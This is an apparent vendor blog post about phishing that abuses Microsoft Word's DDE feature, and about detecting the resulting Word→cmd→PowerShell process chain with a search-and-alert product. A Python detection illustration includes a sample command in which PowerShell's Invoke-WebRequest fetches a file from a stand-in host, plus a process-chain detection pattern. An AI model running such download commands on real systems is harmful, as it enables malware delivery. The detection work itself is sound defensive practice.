Charles Leaver – New Microsoft Word Feature Can Mean Phishing Attacks

Written By Josh Harriman And Presented By Charles Leaver

An interesting multifaceted attack has been reported in a recent blog post by Cisco’s Talos Intelligence team. I want to discuss the infection vector of this attack, as it is quite interesting and something Microsoft has pledged not to fix, since it is a feature and not a bug. Reports can be found of attacks in the wild that make use of a feature in Microsoft Word called Dynamic Data Exchange (DDE). Details of how this is accomplished are reported in this blog post from SecureData.

A Distinctive Phishing Attack with Microsoft Word

Attackers constantly search for new ways to breach an organization. Phishing attacks are among the most common, as adversaries rely on someone either opening a document sent to them or visiting a ‘fabricated’ URL. From there, an exploit against a vulnerable piece of code generally gives them the foothold to start their attack.

In this case, however, the documents did not have anything malicious embedded in the Word file, which is a favored attack vector. Instead they used a sly application of this feature, which lets Word reach out and retrieve the real malicious files. In this way the attackers could hope for, or count on, a much better infection success rate, since malicious Word files themselves can be scanned and deleted before reaching the recipient.

Hunting for Suspicious Behavior with Ziften Zenith

Here at Ziften, we wanted to be able to alert on this behavior for our clients. Finding conditions that exhibit ‘strange’ behavior, such as Microsoft Word spawning a shell, is interesting and not expected. Take it a step further and look for PowerShell running from that spawned shell, and it gets ‘very’ interesting. Using our Search API, we can find these behaviors no matter when they occurred. The system does not need to be online at the time of the search: if it ran a program (i.e. Word) that exhibited these behaviors, we can find that system. Ziften is always collecting and sending relevant process details, which is why we can find the data without depending on the system state at the time of the search.

In our Zenith console, I searched for this condition by looking for the following:

Process → Filepath contains word.exe, Child Process Filepath contains cmd.exe, Child Process Commandline contains powershell

This returns the PIDs (Process IDs) of the processes we saw start under these conditions. From there we can drill down to see the nitty-gritty details.
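As an added illustration (not Ziften code), the same three-condition search expressed as a stand-alone Python check over constructed process records, returning the PIDs of matching Word and cmd.exe processes and the drill-down details for each hit. The Proc fields, host names, users and command lines are assumptions, not data taken from the Zenith console.

```python
from dataclasses import dataclass
from os.path import basename

@dataclass(frozen=True)
class Proc:
    """One process record as an endpoint agent would report it (field names assumed)."""
    pid: int
    ppid: int
    path: str
    cmdline: str
    host: str
    user: str

def image(path):
    """Lower-cased executable name; accepts Windows or POSIX separators."""
    return basename(path.replace("\\", "/")).lower()

def find_word_shell_chains(procs):
    """(word_pid, cmd_pid) for each cmd.exe whose parent image contains
    'word.exe' and whose command line mentions PowerShell. Runs over stored
    records, so the host need not be online at search time."""
    by_pid = {p.pid: p for p in procs}
    hits = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if (image(p.path) == "cmd.exe" and parent is not None
                and "word.exe" in image(parent.path)
                and "powershell" in p.cmdline.lower()):
            hits.append((parent.pid, p.pid))
    return hits

def drill_down(procs, cmd_pid):
    """What an analyst looks at next: host, user, and what cmd passed to PowerShell."""
    p = next(x for x in procs if x.pid == cmd_pid)
    return {"host": p.host, "user": p.user, "cmdline": p.cmdline}

WORD, CMD = r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\System32\cmd.exe"
# Constructed telemetry: a benign Word session, a DDE-style Word -> cmd -> PowerShell
# chain, and a PowerShell launch from cmd under Explorer (pid 900) that must not match.
SAMPLE = [
    Proc(4100, 900, WORD, "WINWORD.EXE /n", "WS01", "alice"),
    Proc(4120, 900, WORD, "WINWORD.EXE invoice.docx", "WS02", "bob"),
    Proc(4188, 4120, CMD, 'cmd.exe /c powershell -Command "Invoke-WebRequest http://example.invalid/fonts.txt"', "WS02", "bob"),
    Proc(5000, 900, CMD, "cmd.exe /c powershell Get-Date", "WS01", "alice"),
]

if __name__ == "__main__":
    for word_pid, cmd_pid in find_word_shell_chains(SAMPLE):
        print(word_pid, cmd_pid, drill_down(SAMPLE, cmd_pid))
```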

In this first screenshot, we can see details of the process tree (Word spawning CMD, with PowerShell under that) on the left, and on the right information such as the system name and user, plus the start time.

In the next image below, we look at the CMD process and get details of exactly what was passed to PowerShell.

Presumably when the user answered this Microsoft Word pop-up dialog box, that is when the CMD shell used PowerShell to go out and fetch some code hosted on the Louisiana Gov website. In the PowerShell image below we can see further information, such as the Network Connect details from when it was connecting to the website to pull the fonts.txt file.

That IP address (206.218.181.46) is in fact the Louisiana Gov site. Sometimes we see intriguing data within our Network Connect information that does not match what you would expect.

After creating our Saved Search, we can alert on these conditions as they occur across the environment. We can also create extensions that change a GPO policy to disallow DDE, or even take additional action and go find these documents and remove them from the system if desired. Being able to discover interesting combinations of conditions within an environment is very powerful, and we are proud to have this feature in our product.